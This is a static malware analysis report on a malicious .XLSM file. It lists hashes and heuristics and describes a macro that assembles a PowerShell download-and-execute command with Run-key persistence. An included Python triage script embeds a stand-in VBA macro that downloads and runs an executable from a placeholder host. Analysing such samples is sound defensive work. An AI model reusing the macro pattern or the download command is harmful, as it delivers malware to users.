Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 a53d910177170c5b…

MALICIOUS

Office (OOXML) / .XLSM

Size: 52.1 KB
Created: 2022-01-04 14:11:58 UTC
Authoring application: Microsoft Excel 15.0300
MD5: d96c08a5155262263e848f6aeb2bc0fd
SHA-1: 5dee76a2832edaa48829d3e702aaf3a8f16626c2
SHA-256: a53d910177170c5b3db633cd8a6f76816eace62d5b5ea5d86ba3240bfd7ba197
Risk score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059.003 Command and Scripting Interpreter: Windows Command Shell

The critical heuristic OLE_VBA_SHELL fires because the VBA macro calls Shell() to execute a command. The command is not stored as a single literal: the macro reassembles it from string fragments at run time, and the reconstructed result is a PowerShell one-liner that downloads 'http://dd8.data.hu/get/356815/13148200/joge.exe', saves it as 'C:\Users\Public\AppData\Public\jigibpqikaxnohadbjcsmah.exe' and executes it. For persistence, the macro writes a value named 'IAccessible2Proxy' under the Run key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run', so the dropped executable is launched again at every logon of the current user. The URL, drop path and Run value are static findings taken from the decoded macro source; the downloaded payload itself was not part of this analysis, and the URL should be treated as an indicator rather than assumed to still be live.

Heuristics (2)

  • OLE_VBA_SHELL (critical): Shell() call in VBA
  • OOXML_VBA (medium): VBA project inside OOXML; the document contains vbaProject.bin, so VBA macros are present
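The behaviour described above (string fragments reassembled into a PowerShell download-and-execute command, a Shell() call, and a Run-key value written for persistence) and the two heuristics are exactly what an analyst re-checks by hand on the decoded macro. The following Python is an added example, not code from this report or from oletools: it takes already-decoded VBA source (a constructed stand-in below that only mimics the described pattern; it is not the sample's real macro, and its URL, drop path and value name are made up), rebuilds concatenated and Chr()-encoded strings by walking the assignments, pulls the argument passed to Shell, extracts URLs, file paths and Run-key writes, and raises OLE_VBA_SHELL. It also shows the OOXML_VBA check on a constructed zip container whose vbaProject.bin is placeholder bytes. The heuristic name VBA_RUN_KEY is hypothetical.

```python
"""Added triage example for a macro-bearing OOXML document (not the report's own code)."""
import io
import re
import zipfile

# Constructed stand-in for decoded macro source (NOT the sample's real code):
# a PowerShell command rebuilt from fragments and Chr(), a Shell() call,
# and a Run-key value. URL, path and value name are made up.
SAMPLE_VBA = r'''
Sub Auto_Open()
    Dim p As String
    p = "pow" & "ersh" & "ell -w hid" & Chr(100) & "en -c "
    p = p & "(New-Object Net.WebClient).Down" & "loadFile('http://example.invalid/get/1/2/stage.exe', 'C:\Users\Public\AppData\Public\stage.exe');"
    p = p & "Start-Process 'C:\Users\Public\AppData\Public\stage.exe'"
    Shell p, vbHide
    CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater", "C:\Users\Public\AppData\Public\stage.exe"
End Sub
'''

RUN_KEY_RE = re.compile(r"^HK(?:CU|LM)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.I)
TOKEN_RE = re.compile(r'"([^"]*)"|Chr\((\d+)\)|([A-Za-z_]\w*)')   # literal | Chr(n) | identifier
ASSIGN_RE = re.compile(r"^\s*([A-Za-z_]\w*)\s*=\s*(.+)$")
SHELL_RE = re.compile(r"^\s*Shell\b\s*\(?(.+?)\)?\s*$")
REGWRITE_RE = re.compile(r"\.RegWrite\s+(.+)$")


def split_top_level(s, sep=","):
    """Split s on sep, ignoring separators inside double-quoted strings."""
    parts, buf, in_str = [], [], False
    for ch in s:
        if ch == '"':
            in_str = not in_str
        if ch == sep and not in_str:
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf))
    return parts


def eval_concat(expr, env):
    """Evaluate a VBA '&' concatenation of literals, Chr(n) and known variables.
    '&' itself is not a token, so it is skipped; unknown identifiers
    (vbHide, keywords) evaluate to the empty string."""
    out = []
    for lit, chr_code, name in TOKEN_RE.findall(expr):
        if chr_code:
            out.append(chr(int(chr_code)))
        elif name:
            out.append(env.get(name, ""))
        else:
            out.append(lit)
    return "".join(out)


def triage_vba(source):
    """Walk decoded VBA line by line, rebuild strings, and collect indicators."""
    env, shell_cmds, run_values = {}, [], []
    for raw in source.splitlines():
        line = raw.strip()
        m = ASSIGN_RE.match(line)
        if m:                                   # x = ... accumulates into env
            env[m.group(1)] = eval_concat(m.group(2), env)
            continue
        m = SHELL_RE.match(line)
        if m:                                   # first argument of Shell is the command
            shell_cmds.append(eval_concat(split_top_level(m.group(1))[0], env))
            continue
        m = REGWRITE_RE.search(line)
        if m:                                   # RegWrite key, value
            args = split_top_level(m.group(1))
            key = eval_concat(args[0], env)
            if RUN_KEY_RE.match(key):
                run_values.append((key, eval_concat(args[1], env) if len(args) > 1 else ""))
    text = "\n".join(shell_cmds + [v for _, v in run_values])
    heuristics = ["OLE_VBA_SHELL"] if shell_cmds else []
    if run_values:
        heuristics.append("VBA_RUN_KEY")        # hypothetical name for this example
    return {
        "heuristics": heuristics,
        "shell_commands": shell_cmds,
        "urls": sorted(set(re.findall(r"https?://[^\s'\"()]+", text))),
        "paths": sorted(set(re.findall(r"[A-Za-z]:\\[^\s'\"();]+", text))),
        "run_values": run_values,
    }


def build_sample_xlsx():
    """Constructed minimal OOXML container; vbaProject.bin is placeholder bytes
    (OLE compound-file magic plus padding), not a real VBA project."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/workbook.xml", "<workbook/>")
        z.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 64)
    return buf.getvalue()


def find_vba_projects(data):
    """OOXML_VBA heuristic: zip members named vbaProject.bin in any folder."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        return [n for n in z.namelist() if n.lower().endswith("vbaproject.bin")]


if __name__ == "__main__":
    print("VBA projects:", find_vba_projects(build_sample_xlsx()))
    for key, value in triage_vba(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

On a real sample the decoded source comes from `olevba` (the macros.bas artifact listed below is exactly that output); this evaluator only resolves literals, Chr() and straight-line assignments, so loops, Mid()/StrReverse() tricks or XOR decoders still need manual work, which is why the reconstructed command should be confirmed against the source rather than trusted blindly.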

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename           Kind         Source                                                          Size
macros.bas         vba-macro    oletools.olevba.extract_macros (decoded VBA source from OOXML)  2344 bytes
                   SHA-256: e6347d5ab22f186f308780ccce3bd228cd0a49cf63125928ea3093c527c68693
vbaProject_00.bin  vba-project  OOXML VBA project: xl/vbaProject.bin                            6144 bytes
                   SHA-256: aceb92196a772b57b1fd15bd01ae6e6d9dba0ae666ad043544d24a6ef4a1c25e